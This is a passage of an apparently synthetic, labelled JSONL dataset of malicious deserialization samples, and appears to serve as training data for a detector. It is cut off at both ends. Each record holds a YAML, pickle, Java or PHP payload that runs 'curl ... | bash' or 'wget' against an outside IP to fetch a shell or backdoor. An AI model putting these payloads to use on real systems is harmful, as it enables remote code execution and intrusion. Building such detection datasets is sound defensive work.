bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://202.37.69.253/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://153.149.29.135/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://202.37.69.253/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00590", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://128.177.151.166/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://128.177.151.166/shell\")"}}]} {"id": "synth_malicious_deserialization_00591", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://151.118.254.52/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://140.242.47.200/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://151.118.254.52/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://140.242.47.200/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00592", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://223.64.47.117/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://53.217.222.161/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://223.64.47.117/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://53.217.222.161/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00593", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://254.27.162.126/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://194.245.245.151/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://254.27.162.126/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://194.245.245.151/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00594", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('SQsbhjS5x6O1Ylf9EX9klfN2zmdZ732PBwWm4NvPC4AyawxRzt+L3+5ujVvP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://31.19.123.25/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('SQsbhjS5x6O1Ylf9EX9klfN2zmdZ732PBwWm4NvPC4AyawxRzt+L3+5ujVvP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00595", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://180.114.104.24/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://67.69.110.252/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://180.114.104.24/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://67.69.110.252/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00596", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://13.7.87.207/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://209.251.0.150/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://13.7.87.207/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://209.251.0.150/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00597", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('lojvdNh7rGAlcgs6GjhmfIpqWeow58hOjvNftqGdCgMHhttI8e37FGYCv6np')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://20.133.55.1/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('lojvdNh7rGAlcgs6GjhmfIpqWeow58hOjvNftqGdCgMHhttI8e37FGYCv6np')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00598", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('HqV2bQSqdeLCmPxK+/XRp9j2vf9IqV1ZCL5mgqMhpS4HZ/8rtcOou+SvVCoK')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://98.250.171.31/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('HqV2bQSqdeLCmPxK+/XRp9j2vf9IqV1ZCL5mgqMhpS4HZ/8rtcOou+SvVCoK')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00599", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://156.16.125.215/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://156.16.125.215/shell\")"}}]} {"id": "synth_malicious_deserialization_00600", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://241.183.147.197/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://221.237.139.42/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://241.183.147.197/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://221.237.139.42/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00601", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('27bGZ4ZaWrmmxOyMoKH9diIGo2KBg15+RaFqC4q7KjF/JFElM0pBxyAq15JT')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://21.199.109.116/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('27bGZ4ZaWrmmxOyMoKH9diIGo2KBg15+RaFqC4q7KjF/JFElM0pBxyAq15JT')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00602", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('xFc2kgqDgGa6kaZqOa/g4DZIKYChyET77Qpv2hUOJLKMjE64aj7cjUTbNAZy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://115.235.96.79/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('xFc2kgqDgGa6kaZqOa/g4DZIKYChyET77Qpv2hUOJLKMjE64aj7cjUTbNAZy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00603", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://67.102.131.215/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://67.102.131.215/shell\")"}}]} {"id": "synth_malicious_deserialization_00604", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://162.96.122.66/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://162.96.122.66/shell\")"}}]} {"id": "synth_malicious_deserialization_00605", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('PSv1yrsQrA/SlHIQ/uZ8QkJWYmeuRErgoJIhQydH5slj36LPb6z3EyYhVt3V')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://123.56.133.51/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('PSv1yrsQrA/SlHIQ/uZ8QkJWYmeuRErgoJIhQydH5slj36LPb6z3EyYhVt3V')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00606", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://26.170.77.235/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://7.9.20.218/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://26.170.77.235/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://7.9.20.218/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00607", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('x+CHdywOwR96xcsr/PhVlHVqeiUUedUGK3qaLAM4lcFvjAvfM7Gsh6Wp8zUF')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://254.172.181.3/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('x+CHdywOwR96xcsr/PhVlHVqeiUUedUGK3qaLAM4lcFvjAvfM7Gsh6Wp8zUF')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00608", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://23.138.37.226/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://215.158.10.224/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://23.138.37.226/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://215.158.10.224/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00609", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://81.98.142.202/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://27.190.42.114/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://81.98.142.202/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://27.190.42.114/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00610", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('Tlei6LexRoLK0z2a4PnML9vB1RUmz5Nb7qEvTA7N07CXUJZxD6eLS3wchGKO')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://128.204.158.33/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Tlei6LexRoLK0z2a4PnML9vB1RUmz5Nb7qEvTA7N07CXUJZxD6eLS3wchGKO')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00611", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://155.88.70.200/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://155.88.70.200/shell\")"}}]} {"id": "synth_malicious_deserialization_00612", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://98.1.64.231/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://43.223.133.218/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://98.1.64.231/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://43.223.133.218/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00613", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('nD6zuaoXP6eA16lX8ZLCQZLsT+wZLz9l1Y3Fp4SGSpNV5J6pDuyhcMwRyHnD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://233.87.210.134/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('nD6zuaoXP6eA16lX8ZLCQZLsT+wZLz9l1Y3Fp4SGSpNV5J6pDuyhcMwRyHnD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00614", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:34:\"GG954SnJpF0JRWygVNGeMaH+hXq6nCGeI8S/Ori0\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://121.163.243.93/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:34:\"GG954SnJpF0JRWygVNGeMaH+hXq6nCGeI8S/Ori0\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://121.163.243.93/bd\")"}}]} {"id": "synth_malicious_deserialization_00615", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:74:\"12wwUXyLLQ1hnc2lW4Tr2anKSDMvPr4tILeBCcQ4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://86.145.21.94/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:74:\"12wwUXyLLQ1hnc2lW4Tr2anKSDMvPr4tILeBCcQ4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://86.145.21.94/bd\")"}}]} {"id": "synth_malicious_deserialization_00616", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://115.157.35.85/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://76.213.218.63/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://115.157.35.85/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://76.213.218.63/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00617", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://60.147.67.203/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://38.236.11.202/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://60.147.67.203/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://38.236.11.202/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00618", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('2MKkGvuQdQF7SO88XUxSrRHYuutssqie1HnYuyZgT1IKIWEFs2ALUmE5XDmD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://218.255.237.74/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('2MKkGvuQdQF7SO88XUxSrRHYuutssqie1HnYuyZgT1IKIWEFs2ALUmE5XDmD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00619", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('mKWYRouvw/L4XognQ8w6WDcEzd2/Lbs4GtkT8DC7s2S6rAIXefSD9sqPuEKD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://29.132.209.45/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('mKWYRouvw/L4XognQ8w6WDcEzd2/Lbs4GtkT8DC7s2S6rAIXefSD9sqPuEKD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00620", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('ErUny/7lbv88LY/NNc5u0lx8QIeGdP0panIDRUAskducb1N+Ze7ktc5deB1u')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://53.214.218.84/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('ErUny/7lbv88LY/NNc5u0lx8QIeGdP0panIDRUAskducb1N+Ze7ktc5deB1u')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00621", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://167.32.251.96/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://14.57.133.146/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://167.32.251.96/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://14.57.133.146/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00622", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://44.193.207.94/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://44.193.207.94/shell\")"}}]} {"id": "synth_malicious_deserialization_00623", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:29:\"lJf5QERVOch+M+nV/Uhuqnr3ALSbgr+ONNpVfxnc\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://24.138.227.204/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:29:\"lJf5QERVOch+M+nV/Uhuqnr3ALSbgr+ONNpVfxnc\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://24.138.227.204/bd\")"}}]} {"id": "synth_malicious_deserialization_00624", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:36:\"RVd9aYUPzzDawg1SYw/g+3QOkQB5qBHDbWFKOimR\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://79.109.202.251/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:36:\"RVd9aYUPzzDawg1SYw/g+3QOkQB5qBHDbWFKOimR\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://79.109.202.251/bd\")"}}]} {"id": "synth_malicious_deserialization_00625", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:75:\"1153mDBImNlXI8LZd4Ecw5tUM0POBv197ryk3Zb2\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://85.39.254.240/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:75:\"1153mDBImNlXI8LZd4Ecw5tUM0POBv197ryk3Zb2\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://85.39.254.240/bd\")"}}]} {"id": "synth_malicious_deserialization_00626", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://156.218.121.57/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://156.218.121.57/shell\")"}}]} {"id": "synth_malicious_deserialization_00627", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://54.0.98.81/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://54.0.98.81/shell\")"}}]} {"id": "synth_malicious_deserialization_00628", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:60:\"ueBhSBavjSNieUhEUc6WmFWNJbdgWPaLnZd/E+2J\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://168.75.10.121/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:60:\"ueBhSBavjSNieUhEUc6WmFWNJbdgWPaLnZd/E+2J\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://168.75.10.121/bd\")"}}]} {"id": "synth_malicious_deserialization_00629", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://214.176.57.107/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://214.176.57.107/shell\")"}}]} {"id": "synth_malicious_deserialization_00630", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://246.194.21.121/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://246.194.21.121/shell\")"}}]} {"id": "synth_malicious_deserialization_00631", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:69:\"W+bBsldLlpPJmuw4WPy3K2gvJSVZK4Xht/RoK+u7\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://36.157.198.45/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:69:\"W+bBsldLlpPJmuw4WPy3K2gvJSVZK4Xht/RoK+u7\";}\n// PHP unserialize() payload\n// Chain: 